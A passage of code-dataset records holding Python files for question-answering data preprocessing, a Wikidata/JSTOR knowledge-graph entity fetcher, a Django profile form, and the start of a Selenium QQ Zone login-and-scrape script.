\"label\"\n\n first_sentences = [[context] * 4 for context in examples[context_name]]\n second_sentences = 
[[f\"{examples[end][i]}\" for end in ending_names] for i in range(len(examples[context_name]))]\n\n # Flatten out\n first_sentences = list(chain(*first_sentences))\n second_sentences = list(chain(*second_sentences))\n\n # Tokenize\n tokenized_examples = self.tokenizer(\n first_sentences,\n second_sentences,\n max_length=self.max_length,\n padding=self.paddings,\n truncation='only_second',\n return_special_tokens_mask=True\n )\n # Un-flatten\n tokenized_inputs = {k: [v[i : i + 4] for i in range(0, len(v), 4)] for k, v in tokenized_examples.items()}\n\n if self.is_train:\n labels = examples[label_column_name]\n tokenized_inputs[\"labels\"] = labels\n else:\n tokenized_inputs[\"ids\"] = examples[\"id\"]\n return tokenized_inputs\n\n def convert_HFdata(self, context_path: str, ori_json: str, HF_json: str) -> None:\n \"\"\"\n convert to HuggingFace SWAG dataset format\n \"\"\"\n with open(context_path, 'r', encoding='utf-8') as file:\n context = json.load(file)\n\n df = pd.read_json(ori_json, orient='records')\n\n if 'relevant' in df.columns:\n df[['paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3', 'label']] = df.apply(\n lambda df, contexts: (contexts[df['paragraphs'][0]], contexts[df['paragraphs'][1]], \n contexts[df['paragraphs'][2]], contexts[df['paragraphs'][3]], df['paragraphs'].index(df['relevant'])), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 'paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3', 'label']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n else:\n df[['paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3']] = df.apply(\n lambda df, contexts: (contexts[df['paragraphs'][0]], contexts[df['paragraphs'][1]], \n contexts[df['paragraphs'][2]], contexts[df['paragraphs'][3]]), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 'paragraphs_0', 'paragraphs_1', 'paragraphs_2', 'paragraphs_3']].to_json(HF_json,\n orient='records', indent=4, force_ascii=False)\n \n\n def preprocess(self, data_files: Dict):\n raw_datasets = load_dataset('json', data_files=data_files)\n if self.is_train:\n raw_datasets = raw_datasets.class_encode_column('label')\n\n processed_datasets = raw_datasets.map(\n self.prepare_feature, batched=True, remove_columns=raw_datasets[\"train\"].column_names\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n return train_dataset, eval_dataset\n else:\n processed_datasets = raw_datasets.map(\n self.prepare_feature, batched=True, remove_columns=raw_datasets[\"test\"].column_names\n )\n\n test_dataset = processed_datasets[\"test\"]\n return test_dataset\n\nclass QADataset(BaseDataset):\n def __init__(self,\n context_path: str,\n paddings: bool,\n max_length: int,\n tokenizer: BertTokenizerFast,\n is_train: bool,\n doc_stride: int,\n **kwargs\n ) -> None:\n self.doc_stride = doc_stride\n super(QADataset, self).__init__(context_path, \n paddings, max_length, tokenizer, is_train, **kwargs)\n\n def prepare_train_features(self, examples):\n question_column_name = \"question\" \n context_column_name = \"context\" \n answer_column_name = \"answers\"\n\n pad_on_right = self.tokenizer.padding_side == \"right\" \n\n # Some of the questions have lots of whitespace on the left, which is not useful and will make the\n # truncation of the context fail (the tokenized question will take a lots of space). 
So we remove that\n # left whitespace\n examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]\n\n # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results\n # in one example possible giving several features when a context is long, each of those features having a\n # context that overlaps a bit the context of the previous feature.\n tokenized_examples = self.tokenizer(\n examples[question_column_name if pad_on_right else context_column_name],\n examples[context_column_name if pad_on_right else question_column_name],\n truncation=\"only_second\" if pad_on_right else \"only_first\",\n max_length=self.max_length,\n stride=self.doc_stride,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n padding=self.paddings\n )\n\n # Since one example might give us several features if it has a long context, we need a map from a feature to\n # its corresponding example. This key gives us just that.\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\n # The offset mappings will give us a map from token to character position in the original context. This will\n # help us compute the start_positions and end_positions.\n offset_mapping = tokenized_examples.pop(\"offset_mapping\")\n\n # Let's label those examples!\n tokenized_examples[\"start_positions\"] = []\n tokenized_examples[\"end_positions\"] = []\n tokenized_examples['cls_index'] = []\n tokenized_examples['overflow_to_sample_mapping'] = []\n\n for i, offsets in enumerate(offset_mapping):\n # We will label impossible answers with the index of the CLS token.\n input_ids = tokenized_examples[\"input_ids\"][i]\n cls_index = input_ids.index(self.tokenizer.cls_token_id)\n tokenized_examples['cls_index'].append(cls_index)\n\n # Grab the sequence corresponding to that example (to know what is the context and what is the question).\n sequence_ids = tokenized_examples.sequence_ids(i)\n\n # One example can give several spans, this is the index of the example containing this span of text.\n sample_index = sample_mapping[i]\n tokenized_examples['overflow_to_sample_mapping'].append(sample_index)\n answers = examples[answer_column_name][sample_index]\n # If no answers are given, set the cls_index as answer.\n if len(answers[\"start\"]) == 0:\n tokenized_examples[\"start_positions\"].append(cls_index)\n tokenized_examples[\"end_positions\"].append(cls_index)\n else:\n # Start/end character index of the answer in the text.\n start_char = answers[\"start\"][0]\n end_char = start_char + len(answers[\"text\"][0])\n\n # Start token index of the current span in the text.\n token_start_index = 0\n while sequence_ids[token_start_index] != (1 if pad_on_right else 0):\n token_start_index += 1\n\n # End token index of the current span in the text.\n token_end_index = len(input_ids) - 1\n while sequence_ids[token_end_index] != (1 if pad_on_right else 0):\n token_end_index -= 1\n\n # Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).\n if not (offsets[token_start_index][0] <= start_char and offsets[token_end_index][1] >= end_char):\n tokenized_examples[\"start_positions\"].append(cls_index)\n tokenized_examples[\"end_positions\"].append(cls_index)\n else:\n # Otherwise move the token_start_index and token_end_index to the two ends of the answer.\n # Note: we could go after the last offset if the answer is the last word (edge case).\n while token_start_index < len(offsets) and offsets[token_start_index][0] <= 
start_char:\n token_start_index += 1\n tokenized_examples[\"start_positions\"].append(token_start_index - 1)\n while offsets[token_end_index][1] >= end_char:\n token_end_index -= 1\n tokenized_examples[\"end_positions\"].append(token_end_index + 1)\n\n return tokenized_examples\n\n # Validation preprocessing\n def prepare_validation_features(self, examples):\n question_column_name = \"question\" \n context_column_name = \"context\" \n\n pad_on_right = self.tokenizer.padding_side == \"right\" \n # Some of the questions have lots of whitespace on the left, which is not useful and will make the\n # truncation of the context fail (the tokenized question will take a lots of space). So we remove that\n # left whitespace\n examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]\n\n # Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results\n # in one example possible giving several features when a context is long, each of those features having a\n # context that overlaps a bit the context of the previous feature.\n tokenized_examples = self.tokenizer(\n examples[question_column_name if pad_on_right else context_column_name],\n examples[context_column_name if pad_on_right else question_column_name],\n truncation=\"only_second\" if pad_on_right else \"only_first\",\n max_length=self.max_length,\n stride=self.doc_stride,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n padding=self.paddings,\n )\n\n # Since one example might give us several features if it has a long context, we need a map from a feature to\n # its corresponding example. This key gives us just that.\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\n\n # For evaluation, we will need to convert our predictions to substrings of the context, so we keep the\n # corresponding example_id and we will store the offset mappings.\n tokenized_examples[\"example_id\"] = []\n tokenized_examples['overflow_to_sample_mapping'] = []\n\n for i in range(len(tokenized_examples[\"input_ids\"])):\n # Grab the sequence corresponding to that example (to know what is the context and what is the question).\n sequence_ids = tokenized_examples.sequence_ids(i)\n context_index = 1 if pad_on_right else 0\n\n # One example can give several spans, this is the index of the example containing this span of text.\n sample_index = sample_mapping[i]\n tokenized_examples['overflow_to_sample_mapping'].append(sample_index)\n tokenized_examples[\"example_id\"].append(examples[\"id\"][sample_index])\n\n # Set to None the offset_mapping that are not part of the context so it's easy to determine if a token\n # position is part of the context or not.\n tokenized_examples[\"offset_mapping\"][i] = [\n (o if sequence_ids[k] == context_index else None)\n for k, o in enumerate(tokenized_examples[\"offset_mapping\"][i])\n ]\n\n return tokenized_examples\n\n def convert_HFdata(self, context_path: str, ori_json: str, HF_json: str) -> None:\n \"\"\"\n convert to HuggingFace SQUAD dataset format\n \"\"\"\n with open(context_path, 'r', encoding='utf-8') as file:\n context = json.load(file)\n\n with open('relevant.json', 'r', encoding='utf-8') as file:\n relevant = json.load(file)\n\n df = pd.read_json(ori_json, orient='records')\n\n if 'answer' in df.columns:\n df[['context', 'answers']] = df.apply(\n lambda df, context: (context[df['relevant']], {k: [v] for k, v in df['answer'].items()}), args=(context,),\n axis=1, result_type='expand')\n df[['id', 'question', 
'context', 'answers']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n else:\n df['relevant'] = df['id'].map(relevant)\n df['context'] = df['relevant'].apply(\n lambda s, context: context[int(s)] , args=(context,))\n df[['id', 'question', 'context']].to_json(HF_json, \n orient='records', indent=4, force_ascii=False)\n\n # print(df.head())\n\n def preprocess(self, data_files: Dict):\n raw_datasets = load_dataset('json', data_files=data_files)\n if self.is_train:\n train_dataset = raw_datasets[\"train\"]\n train_dataset = train_dataset.map(\n self.prepare_train_features, batched=True, remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on train dataset\"\n )\n\n eval_example = raw_datasets[\"validation\"]\n train_feature = eval_example.map(\n self.prepare_train_features, batched=True, remove_columns=raw_datasets[\"validation\"].column_names,\n desc=\"Running tokenizer on validation dataset\"\n )\n valid_feature = eval_example.map(\n self.prepare_validation_features, batched=True, remove_columns=raw_datasets[\"validation\"].column_names,\n desc=\"Running tokenizer on validation dataset\"\n )\n for column in valid_feature.column_names:\n if column not in train_feature.column_names:\n assert len(valid_feature[column]) == torch.tensor(train_feature[\"input_ids\"]).shape[0]\n train_feature = train_feature.add_column(column, valid_feature[column])\n else:\n assert torch.tensor(train_feature[column]).shape == torch.tensor(valid_feature[column]).shape\n eval_dataset = train_feature\n return train_dataset, dict(preprocessed=eval_dataset, non_preprocessed=eval_example)\n else:\n test_example = raw_datasets['test']\n test_dataset =test_example.map(\n self.prepare_validation_features, batched=True, remove_columns=raw_datasets[\"test\"].column_names,\n desc=\"Running tokenizer on prediction dataset\"\n )\n\n return dict(preprocessed=test_dataset, non_preprocessed=test_example)\n","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW2/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29705445426","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(filename)s : %(levelname)s : %(message)s')\nlogger = logging.getLogger()\n\nimport os\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\nimport json\nimport getopt\nimport sys\nimport traceback\nfrom urllib.parse import quote\nfrom collections import OrderedDict\n\nimport requests\nlogging.getLogger('requests').setLevel(logging.INFO)\n\nimport markdown as markdown_parser\nfrom bs4 import BeautifulSoup\n\nfrom fingerprints import get_fingerprints\n\nGRAPHS = [\n {\n 'ns': 'jstor',\n 'prefix': 'http://kg.jstor.org/entity/',\n 'baseurl': 'https://kg.jstor.org/entity',\n 'sparql_endpoint': 'https://kg-query.jstor.org/proxy/wdqs/bigdata/namespace/wdq/sparql',\n 'api_endpoint': 'https://kg.jstor.org/w/api.php',\n 'types': {\n 'entity': 'Q13'\n }\n },\n {\n 'ns': 'wd',\n 'prefix': 'http://www.wikidata.org/entity/',\n 'baseurl': 'https://www.wikidata.org/entity',\n 'sparql_endpoint': 'https://query.wikidata.org/sparql',\n 'api_endpoint': 'https://www.wikidata.org/w/api.php',\n 'types': {\n 'entity': 'Q35120'\n }\n }\n]\nPREFIXES = dict([(g['ns'],g['prefix']) for g in GRAPHS])\nNAMESPACES = set([g['ns'] for g in GRAPHS])\ndefault_ns = 'wd'\ndefault_entity_type = 'entity'\n\ndef as_uri(s, acct=None, 
repo=None, **kwargs):\n global default_ns\n uri = None\n if s.startswith('http'):\n uri = s\n else:\n prefix, entity_id = s.split(':') if ':' in s else (default_ns, s)\n logger.info(f'as_uri: prefix={prefix} entity_id={entity_id} {_is_entity_id(entity_id, False)}')\n if prefix in PREFIXES and _is_entity_id(entity_id, False):\n logger.info(f'{prefix}:{entity_id}')\n uri = f'{PREFIXES[prefix]}{entity_id}'\n else:\n uri = f'http://{acct}.github.io/{repo}/entity/{s}'\n logger.info(uri)\n return uri\n\nclass KnowledgeGraph(object):\n\n def __init__(self, **kwargs):\n self.acct = kwargs.get('acct')\n self.repo = kwargs.get('repo')\n self.cache = kwargs.get('cache', {})\n self.entity_type = kwargs.get('entity_type', default_entity_type)\n self.prop_mappings = {}\n self.formatter_urls = {}\n for g in GRAPHS:\n self.prop_mappings[g['ns']] = dict([(p['id'], p) for p in self._properties(g)])\n self.formatter_urls[g['ns']] = dict([(p['id'], p) for p in self._formatter_urls(g)])\n logger.info(f'KnowledgeGraph: acct={self.acct} repo={self.repo}')\n\n def entity(self, uri, project=None, raw=False, article=None, **kwargs):\n logger.info(f'entity={uri} project={project} raw={raw} article={article}')\n refresh = str(kwargs.pop('refresh', 'false')).lower() in ('', 'true')\n\n cache_key = f'{uri}-{project}'\n entity = self.cache.get(cache_key) if not refresh and not raw else None\n if entity:\n entity['fromCache'] = True\n return entity\n \n secondary = None\n if uri.startswith('http://kg.jstor.org/'):\n primary = self._entity_from_wikibase(uri)\n primary['id'] = f'jstor:{primary[\"id\"]}'\n if primary and 'Wikidata entity ID' in primary.get('claims', {}):\n secondary = self._entity_from_wikibase(primary['claims'].pop('Wikidata entity ID')[0]['value']['url'])\n elif uri.startswith('http://www.wikidata.org/'):\n primary = self._entity_from_wikibase(uri)\n primary['id'] = f'wd:{primary[\"id\"]}'\n else:\n uri = uri if uri.endswith('.json') else f'{uri}.json'\n primary = self._entity_from_url(uri)\n wd_id = None\n statements = []\n for stmt in primary.get('statements', []):\n if stmt['claim']['property'] == 'Wikidata entity ID':\n wd_id = stmt['claim']['value']\n else:\n statements.append(stmt)\n if wd_id:\n # keep only the filtered statements; the Wikidata ID claim is resolved separately\n primary['statements'] = statements\n secondary = self._entity_from_wikibase(f'http://www.wikidata.org/entity/{wd_id}')\n\n if secondary: # merge primary and secondary\n entity = {'id': primary['id']}\n for fld in ('labels', 'descriptions', 'aliases', 'claims'):\n entity[fld] = {**secondary.get(fld,{}), **primary.get(fld,{})}\n else:\n entity = primary\n\n if not raw:\n self._add_summary_text(entity, project, article, **kwargs)\n \n entity = self._add_id_labels(entity, get_fingerprints(self._find_ids(entity)))\n \n self.cache[cache_key] = entity\n\n entity['fromCache'] = False\n\n return entity\n\n def _entity_from_url(self, uri):\n for suffix in ('', '.json', '.jsonld'):\n try:\n entity = requests.get(f'{uri}{suffix}').json()\n if 'id' not in entity:\n entity['id'] = uri.replace('https', 'http').replace('.json', '').replace('.jsonld', '')\n return entity\n except:\n pass\n return {}\n\n def _entity_from_wikibase(self, uri, language='en', entity_type='entity'):\n '''Gets entity data directly from wikibase API (rather than a SPARQL query) and\n returns a simplified representation of data with property IDs converted to labels enabling\n property merging with other graphs using a compatible data model'''\n g = [g for g in GRAPHS if uri.startswith(g['prefix'])][0]\n qid = uri.split('/')[-1]\n ns = g['ns']\n entity_url = 
f'{g[\"api_endpoint\"]}?format=json&action=wbgetentities&ids={qid}'\n resp = requests.get(entity_url).json()\n raw_entity = resp.get('entities', {}).get(qid)\n entity = OrderedDict()\n for fld in ('id', 'labels', 'descriptions', 'aliases'):\n if fld in raw_entity:\n entity[fld] = raw_entity[fld]\n if 'claims' in raw_entity:\n entity['claims'] = self._claims(raw_entity['claims'], ns)\n return entity\n\n def _claims(self, claims, ns='wd'):\n '''Converts wikibase claims into a simplified version with property IDs (Pxxxx)\n converted to text using the property labels.'''\n _claims = {}\n for prop, stmts in claims.items():\n prop_label = self.prop_mappings[ns].get(prop, {}).get('label', prop)\n _claims[prop_label] = []\n for stmt in stmts:\n stmt_value = self._stmt_value(stmt['mainsnak'], ns)\n if not stmt_value:\n continue\n value = {'value': stmt_value}\n _claims[prop_label].append(value)\n if 'qualifiers' in stmt:\n value['qualifiers'] = {}\n for qual_prop, qualifiers in stmt['qualifiers'].items():\n qualifier_label = self.prop_mappings[ns][qual_prop]['label']\n value['qualifiers'][qualifier_label] = []\n for qualifier in qualifiers:\n value['qualifiers'][qualifier_label].append(self._stmt_value(qualifier, ns))\n if 'references' in stmt:\n value['references'] = []\n for reference in stmt['references']:\n value['references'].append({})\n for ref_prop, ref_stmts in reference['snaks'].items():\n ref_label = self.prop_mappings[ns][ref_prop]['label']\n value['references'][-1][ref_label] = []\n for ref_stmt in ref_stmts:\n value['references'][-1][ref_label].append(self._stmt_value(ref_stmt, ns))\n return _claims\n \n def _stmt_value(self, stmt, ns='wd'):\n '''Performs any needed statement value conversions'''\n if 'datavalue' in stmt:\n datatype = stmt['datatype']\n value = stmt['datavalue']['value']\n if datatype in ('commonsMedia', 'string', 'url'):\n return value\n elif datatype == 'external-id':\n extid = {'id': value}\n if 'property' in stmt and stmt['property'] in self.formatter_urls[ns]:\n extid['url'] = self.formatter_urls[ns][stmt[\"property\"]][\"url\"].replace('$1', value)\n return extid\n elif datatype == 'wikibase-item':\n return f'{ns}:{value[\"id\"]}'\n elif datatype == 'globe-coordinate':\n return [value['latitude'], value['longitude']]\n elif datatype == 'quantity':\n # https://www.mediawiki.org/wiki/Wikibase/DataModel/JSON#quantity\n value['unit'] = value['unit'].replace('http://www.wikidata.org/entity/', 'wd:')\n return value\n elif datatype == 'time':\n # More info on time precision can be found at https://www.mediawiki.org/wiki/Wikibase/DataModel/JSON#time\n return {'time': value['time'][1:], 'precision': value['precision']}\n elif datatype == 'monolingualtext':\n return value # TODO\n else:\n logger.warning(f'Unrecognized datatype {datatype} with value {value}')\n return value\n\n def _properties(self, g):\n '''Get property mappings for graph to map property entity IDs to labels'''\n cached_props_path = f'mappings/{g[\"ns\"]}-props.json'\n if os.path.exists(cached_props_path):\n with open (cached_props_path, 'r') as fp:\n props = json.load(fp)\n return props\n else:\n sparql = '''\n SELECT ?property ?propertyType ?propertyLabel ?propertyDescription ?propertyAltLabel WHERE {\n ?property wikibase:propertyType ?propertyType .\n SERVICE wikibase:label { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE],en\". 
}\n }\n ORDER BY ASC(xsd:integer(STRAFTER(STR(?property), 'P')))'''\n sparql_results = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n ).json()['results']['bindings']\n props = [\n {\n 'id': p['property']['value'].split('/')[-1],\n 'type': p['propertyType']['value'].split('#')[-1],\n 'label': p['propertyLabel']['value'],\n 'description': p['propertyDescription']['value'] if 'propertyDescription' in p else None,\n 'aliases': p['propertyAltLabel']['value'].split(',') if 'propertyAltLabel' in p else []\n } for p in sparql_results\n ]\n with open (cached_props_path, 'w') as fp:\n json.dump(props, fp)\n return props\n\n def _formatter_urls(self, g):\n '''Get all formatter URLs for graph for converting external entity IDs to full URL'''\n cached_path = f'mappings/{g[\"ns\"]}-formatter-urls.json'\n if os.path.exists(cached_path):\n with open (cached_path, 'r') as fp:\n formatter_urls = json.load(fp)\n return formatter_urls\n else:\n for prop, value in self.prop_mappings[g['ns']].items():\n if value['label'] == 'formatter URL':\n break\n sparql = '''\n SELECT ?entity ?label ?formatterURL WHERE {\n ?entity wdt:%s ?formatterURL ;\n rdfs:label ?label .\n FILTER(LANG(?label) = 'en')\n }''' % (prop)\n sparql_results = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n ).json()['results']['bindings']\n formatter_urls = [\n {\n 'id': p['entity']['value'].split('/')[-1],\n 'label': p['label']['value'],\n 'url': p['formatterURL']['value']\n } for p in sparql_results\n ]\n with open (cached_path, 'w') as fp:\n json.dump(formatter_urls, fp)\n return formatter_urls\n\n def _add_summary_text(self, entity, project=None, article=None, **kwargs):\n '''Finds and adds summary data for entity. For Wikidata entities the summary data is obtained\n from the Wikipedia article linked to the entity in the graph, if any. 
For entities in the JSTOR\n graph the summary data (if any) is referenced by the \"described at URL\" property'''\n logger.info(f'_add_summary_text: id={entity.get(\"id\")} project={project} article={article}')\n summary_url = None\n if article:\n summary_url = f'https://{self.acct}.github.io/{self.repo}/articles/{article}.md'\n elif entity.get('id'):\n if 'described at URL' in entity['claims']:\n for stmt in entity['claims']['described at URL']:\n # Ignore summary data associated with a specific project unless the\n # property code is proided as a method argument\n if not _is_entity_id(stmt['value'].split('/')[-1], False):\n if project:\n if project in stmt.get('qualifiers',{}).get('project code',[]):\n summary_url = stmt['value']\n else:\n if 'project code' not in stmt.get('qualifiers', {}):\n summary_url = stmt['value']\n elif entity['id'].startswith('wd:'):\n g = [g for g in GRAPHS if g['ns'] == 'wd'][0]\n sparql = '''\n SELECT ?mwPage {\n ?mwPage schema:about %s .\n ?mwPage schema:isPartOf .\n }''' % (entity['id'])\n resp = requests.post(\n g['sparql_endpoint'],\n headers={\n 'Accept': 'application/sparql-results+json;charset=UTF-8',\n 'Content-type': 'application/x-www-form-urlencoded',\n 'User-agent': 'JSTOR Labs python client'},\n data='query=%s' % quote(sparql)\n )\n if resp.status_code == 200:\n resp = resp.json()\n if resp['results']['bindings']:\n summary_url = resp['results']['bindings'][0]['mwPage']['value']\n else:\n logger.info(f'_add_summary_text: resp_code={resp.status_code} msg={resp.text}')\n\n if summary_url:\n page = summary_url.replace('/w/', '/wiki/').split('/wiki/')[-1]\n if 'wikipedia.org/wiki/' in summary_url:\n # Summary data from Wikipedia comes back nicely formatted. We just add it to the entity\n entity['summary info'] = requests.get(\n f'https://en.wikipedia.org/api/rest_v1/page/summary/{page}',\n headers={'User-agent': 'JSTOR Labs python client'},\n ).json()\n elif 'kg.jstor.org/wiki' in summary_url:\n # We need to create formatted summary data from the wikitext in the referenced mediawiki page\n # Any data extracted is used to update the Wikidata/Wikipedia summary data, if found. Currently\n # this just includes the extract text in raw and HTML\n resp = requests.get(f'https://kg.jstor.org/w/api.php?action=parse&format=json&page={page}').json()\n html = BeautifulSoup(resp['parse']['text']['*'], 'html5lib')\n extract = html.find('p')\n if extract:\n entity['summary info'] = {\n 'extract_html': str(extract).replace('\\n',''),\n 'extract': extract.text.strip()\n }\n else:\n logger.info(summary_url)\n md = requests.get(summary_url).content.decode('utf-8')\n html = markdown_parser.markdown(md, output_format='html5')\n soup = BeautifulSoup(html, 'html5lib')\n paragraphs = ['\\n'.join(p.contents) for p in soup.find_all('p')]\n logger.info('\\f'.join(paragraphs))\n entity['summary info'] = {'extract_html': '

'.join(paragraphs)}\n\n def _find_ids(self, entity):\n ids = set()\n self._find_ids_recursive(entity, ids)\n return ids\n\n def _find_ids_recursive(self, d, ids):\n if not isinstance(d, (dict, list, str)):\n return ids\n if isinstance(d, str):\n if _is_entity_id(d):\n ids.add(d)\n elif isinstance(d, list):\n for v in d:\n self._find_ids_recursive(v, ids)\n else: # a dict\n for v in d.values():\n self._find_ids_recursive(v, ids)\n\n def _add_id_labels(self, d, fingerprints):\n if not isinstance(d, (dict, list, str)):\n return d\n if isinstance(d, str):\n if _is_entity_id(d):\n if d in fingerprints:\n ns, qid = d.split(':')\n label = fingerprints[d]['label']\n g = [g for g in GRAPHS if g['ns'] == ns][0]\n url = f'{g[\"baseurl\"]}/{qid}'\n d = {'id': d, 'value': label, 'url': url}\n return d\n elif isinstance(d, list):\n return [v for v in (self._add_id_labels(v, fingerprints) for v in d) if v]\n return {k: v for k, v in ((k, self._add_id_labels(v, fingerprints)) for k, v in d.items()) if v}\n\n\ndef _is_entity_id(s, ns_required=True):\n if not s or not isinstance(s, str): return False\n eid = s.split(':')\n if len(eid) == 1 and ns_required:\n return False\n if len(eid) == 2 and eid[0] not in NAMESPACES:\n return False\n if len(eid) > 2:\n return False\n return len(eid[-1]) > 1 and eid[-1][0] in ('Q', 'P') and eid[-1][1:].isdecimal()\n\ndef usage():\n print('%s [hl:jrp:] qid' % sys.argv[0])\n print(' -h --help Print help message')\n print(' -l --loglevel Logging level (default=warning)')\n print(' -j --raw Return raw jsonld')\n print(' -r --refresh Refresh cache')\n print(' -p --project Entity context')\n\nif __name__ == '__main__':\n logger.setLevel(logging.WARNING)\n kwargs = {}\n try:\n opts, args = getopt.getopt(\n sys.argv[1:], 'hl:jrp:', ['help', 'loglevel', 'raw', 'refresh', 'project'])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(str(err)) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n for o, a in opts:\n if o in ('-l', '--loglevel'):\n loglevel = a.lower()\n if loglevel in ('error',): logger.setLevel(logging.ERROR)\n elif loglevel in ('warn','warning'): logger.setLevel(logging.INFO)\n elif loglevel in ('info',): logger.setLevel(logging.INFO)\n elif loglevel in ('debug',): logger.setLevel(logging.DEBUG)\n elif o in ('-j', '--raw'):\n kwargs['raw'] = True\n elif o in ('-r', '--refresh'):\n kwargs['refresh'] = True\n elif o in ('-p', '--project'):\n kwargs['project'] = a\n elif o in ('-h', '--help'):\n usage()\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\n kg = KnowledgeGraph(**kwargs)\n\n if args:\n kwargs['uri'] = as_uri(args[0])\n print(json.dumps(kg.entity(**kwargs)))\n else:\n usage()\n sys.exit()\n","repo_name":"camilouribebotta/visual-essays","sub_path":"service/src/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":20271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33412324498","text":"from django.forms import ModelForm\n\nfrom .models import UrFUProfile\n\n\nclass UrFUProfileForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(UrFUProfileForm, self).__init__(*args, **kwargs)\n self.fields['SNILS'].error_messages = {\n \"required\": u\"Введите СНИЛС\",\n \"invalid\": u\"Некорректно\",\n }\n self.fields['specialty'].error_messages = {\n \"required\": u\"Введите специальность (направление подготовки)\",\n \"invalid\": u\"Некорректно\",\n }\n\n class Meta:\n model = UrFUProfile\n fields = 
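# --- Hedged usage notes (ours, not from the source): what the _is_entity_id helper
# above accepts. It expects an optional known namespace prefix and a Q/P identifier.
assert _is_entity_id('wd:Q42')
assert _is_entity_id('jstor:P13')
assert not _is_entity_id('Q42')                    # namespace required by default
assert _is_entity_id('Q42', ns_required=False)     # bare IDs allowed when relaxed
assert not _is_entity_id('foo:Q42')                # unknown namespace is rejected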
+{"seq_id":"33412324498","text":"from django.forms import ModelForm\n\nfrom .models import UrFUProfile\n\n\nclass UrFUProfileForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(UrFUProfileForm, self).__init__(*args, **kwargs)\n self.fields['SNILS'].error_messages = {\n \"required\": u\"Введите СНИЛС\",\n \"invalid\": u\"Некорректно\",\n }\n self.fields['specialty'].error_messages = {\n \"required\": u\"Введите специальность (направление подготовки)\",\n \"invalid\": u\"Некорректно\",\n }\n\n class Meta:\n model = UrFUProfile\n fields = ['last_name', 'first_name', 'second_name', 'phone', 'SNILS', 'specialty', 'country', 'education_level',\n 'job', 'position', 'birth_date']\n","repo_name":"umnoc/umnoc-edx","sub_path":"umnoc/profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
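# --- Hedged sketch (ours): how the per-field error_messages set in UrFUProfileForm
# surface during validation. Assumes a configured Django app with the UrFUProfile
# model available; the Russian messages are the form's own localized strings.
form = UrFUProfileForm(data={})          # empty submission triggers "required"
if not form.is_valid():
    print(form.errors.get('SNILS'))      # -> ['Введите СНИЛС']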
+{"seq_id":"17133571654","text":"# -*- coding:utf-8 -*-\nimport requests\nimport os,time,sys\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nfrom tqdm import tqdm\n\n# Log in\ndef logIn(name,pw):\n global driver\n driver.get('http://i.qq.com/')\n driver.maximize_window()\n driver.switch_to_frame(driver.find_element_by_id('login_frame'))\n upElement = driver.find_element_by_id('switcher_plogin')\n upElement.click()\n # enter the account and password, then submit\n uElement = driver.find_element_by_id('u')\n pElement = driver.find_element_by_id('p') \n uElement.clear() \n uElement.send_keys(name)\n pElement.clear()\n pElement.send_keys(pw)\n time.sleep(1)\n loginB = driver.find_element_by_id('login_button')\n loginB.click()\n time.sleep(1)\n if driver.current_url == \"http://user.qzone.qq.com/\"+name:\n print ('Login succeeded!')\n else:\n print ('Login failed, landed on '+driver.current_url)\n print ('Please log in again')\n logIn(name,pw)\n\n\n# Get the total number of pages of shuoshuo posts\ndef allPages():\n global driver\n # by default driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n try:\n element = WebDriverWait(driver,10).until(\n EC.presence_of_element_located((By.ID,'_pager_content_0'))\n )\n except:\n print ('allPages error')\n return None\n else:\n driver.find_element_by_id('_pager_content_0')\n bsPaperNum = BeautifulSoup(driver.page_source,'lxml')\n # the title \"下一页\" (\"next page\") is page text used for matching and must stay in Chinese\n return int(bsPaperNum.find('a',title=\"下一页\").previous_sibling.get_text())\n\n# Switch to the next page\ndef nextPage(i):\n global driver\n # by default driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n try:\n element = 